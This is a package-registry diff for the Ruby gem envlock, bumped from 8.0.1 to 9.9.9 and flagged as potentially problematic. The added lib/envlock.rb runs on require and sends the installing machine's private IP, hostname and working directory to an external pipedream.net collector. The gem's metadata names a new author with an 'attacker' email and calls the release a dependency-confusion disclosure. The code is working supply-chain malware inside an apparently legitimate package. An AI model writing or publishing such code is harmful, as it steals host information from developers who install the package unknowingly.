envlock 8.0.1 → 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of envlock might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/lib/envlock.rb +30 -0
- metadata +12 -11
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: b2f90a32fc9ae913d62d2c74ce42e6fbeea7c16ff5aa772b2ba40fd187998291
|
|
4
|
+
data.tar.gz: 6b7d07f9e8a189866fbf5182f2d1f4ff9de7ba2ad364570766c953fc119b706d
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 34a02780d40abf4ef67cd480f362a382372a69ac960bce543919c72fac36bcebd372e0611b1ccadac53bfa4374b973bf4c0ebba1f01ec7f239278a3634955856
|
|
7
|
+
data.tar.gz: f14611d28bac6b44edac9d60af45c00998ebf7ec46d889dc06f73f5032d1a8c45deeb8fb3e95ad5305e5e6f4568fa1b1ee832586bf0e77f560989daab665321d
|
data/lib/envlock.rb
ADDED
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
require "envlock/version"
|
|
2
|
+
|
|
3
|
+
module envlock
|
|
4
|
+
|
|
5
|
+
require 'json'
|
|
6
|
+
require 'net/http'
|
|
7
|
+
require 'socket'
|
|
8
|
+
|
|
9
|
+
#Private IP
|
|
10
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
|
|
11
|
+
#Hostname
|
|
12
|
+
hostname = Socket.gethostname
|
|
13
|
+
#Current directory
|
|
14
|
+
dir = Dir.pwd
|
|
15
|
+
|
|
16
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
|
17
|
+
uri = URI('https://eox7hb9vmzgf94.m.pipedream.net')
|
|
18
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
|
19
|
+
|
|
20
|
+
req.body = {
|
|
21
|
+
private_ip: privip,
|
|
22
|
+
hostname: hostname,
|
|
23
|
+
current_directory: dir
|
|
24
|
+
}.to_json
|
|
25
|
+
|
|
26
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
|
|
27
|
+
http.request(req)
|
|
28
|
+
end
|
|
29
|
+
|
|
30
|
+
end
|
metadata
CHANGED
|
@@ -1,24 +1,25 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: envlock
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version:
|
|
4
|
+
version: 9.9.9
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
|
-
-
|
|
7
|
+
- naveen kumawat
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2023-07-
|
|
11
|
+
date: 2023-07-14 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
|
-
description:
|
|
14
|
-
email:
|
|
15
|
-
- maciej@mensfeld.pl
|
|
13
|
+
description: This Ruby package vulnerable to dependency confiuse vulnerability
|
|
14
|
+
email: nvkattacker@gmail.com
|
|
16
15
|
executables: []
|
|
17
16
|
extensions: []
|
|
18
17
|
extra_rdoc_files: []
|
|
19
|
-
files:
|
|
20
|
-
|
|
21
|
-
|
|
18
|
+
files:
|
|
19
|
+
- lib/envlock.rb
|
|
20
|
+
homepage: https://rubygems.org/gems/envlock
|
|
21
|
+
licenses:
|
|
22
|
+
- MIT
|
|
22
23
|
metadata: {}
|
|
23
24
|
post_install_message:
|
|
24
25
|
rdoc_options: []
|
|
@@ -35,8 +36,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
35
36
|
- !ruby/object:Gem::Version
|
|
36
37
|
version: '0'
|
|
37
38
|
requirements: []
|
|
38
|
-
rubygems_version: 3.3.
|
|
39
|
+
rubygems_version: 3.0.3.1
|
|
39
40
|
signing_key:
|
|
40
41
|
specification_version: 4
|
|
41
|
-
summary:
|
|
42
|
+
summary: 'Vulnerability Disclosure: Dependency confiuse vulnerability'
|
|
42
43
|
test_files: []
|